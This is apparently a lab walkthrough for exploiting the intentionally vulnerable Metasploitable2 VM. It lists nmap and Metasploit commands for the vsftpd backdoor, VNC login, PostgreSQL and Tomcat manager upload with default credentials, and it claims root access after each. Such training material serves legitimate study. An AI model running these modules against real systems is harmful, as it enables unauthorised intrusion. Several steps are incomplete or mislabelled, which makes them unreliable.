Comprehensive Metasploitable2 Exploitation Walkthrough
Introduction:
Metasploitable2, developed by Rapid7, is a valuable tool designed for developing and executing exploits against vulnerable systems. This walkthrough outlines the step-by-step process of exploiting different ports on Metasploitable2 for educational purposes.
Discovery Phase:
The default login credentials for the Metasploitable2 machine is msfadmin:msfadmin.
Identifying the victim’s IP address using the `ifconfig` command.
Utilizing Kali Linux with Nmap to scan open ports on the Metasploitable2 machine:
‘Command: sudo nmap -sV -Pn Target/Victim Machine IP`.
1. FTP Exploitation (Port 21):
FTP (File Transfer Protocol) is a standard network protocol used for the transfer of files between a client and a server on a computer network. It enables the uploading and downloading of files, providing a simple way to share and manage data.
- Method 1: Establishing a connection using FTP credentials.
Command: `ftp 192.168.137.128`
- Method 2: Exploiting FTP through the Metasploit framework.
- Commands:
-`msfconsole`
-`search vsftpd`
- `use exploit/unix/ftp/vsftpd_234_backdoor`
- `set RHOSTS 192.168.137.128`
-`run`
Congratulations! We’ve gained root access through FTP exploits.
2. Telnet Exploitation (Port 23):
Telnet is a simple, text-based network protocol that is used for accessing remote computers over TCP/IP networks like the Internet.
- Connecting to Telnet using the command: `telnet 192.168.137.128`.
Congratulations! Root access is achieved via Telnet exploits.
3. VNC Exploitation (Port 5900):
Port 5900 is commonly associated with VNC (Virtual Network Computing), a remote desktop sharing system. When used in combination with VNC, port 5900 is often the default port for the initial display (desktop) on a VNC server. VNC allows a user to view and interact with the graphical desktop environment of a remote computer over a network.
- Utilizing Metasploit to exploit VNC login.
- Commands:
- `msfconsole`
- `search auxiliary/scanner/vnc/vnc_login`
-`set RHOST 192.168.137.128`
-`vncviewer 192.168.137.128`
Pop windows of VNC
Congratulations! Root access is secured through VNC exploits.
4. PostgreSQL Exploitation (Port 5432):
PostgreSQL is a powerful open-source relational database management system (RDBMS) known for its extensibility and advanced features, providing a robust platform for managing and querying structured data.
- Searching and exploiting PostgreSQL vulnerabilities.
- Commands:
- `msfconsole`
-`search PostgreSQL`
- `set RHOSTS 192.168.137.128`
- `set LHOST 192.168.137.129`
-`run`
Congratulations! We’ve successfully acquired root access via PostgreSQL exploits.
5. Apache Tomcat Exploitation (Port 8180):
Apache Tomcat is an open-source application server that executes Java servlets and JavaServer Pages, providing a robust environment for Java-based web applications. It serves as a reliable and scalable platform for deploying Java web applications.
- Searching for Apache Tomcat exploits in Metasploit.
- Commands:
- `msfconsole`
-`search apache tomcat`
- `use exploit/multi/http/tomcat_mgr_upload`
- `set RHOSTS 192.168.137.128`
- `set RPORT 8180`
-`set HttpPassword tomcat`
- `set HttpUsername tomcat`
-`run`
Congratulations! Root access is attained through Apache Tomcat exploits.
Conclusion:
Congratulations, you have successfully gained root access to the Metasploitable2 machine through various port exploitation techniques. This walkthrough serves as a comprehensive guide for educational purposes, demonstrating the importance of securing systems against potential vulnerabilities.
Keep learning and Shining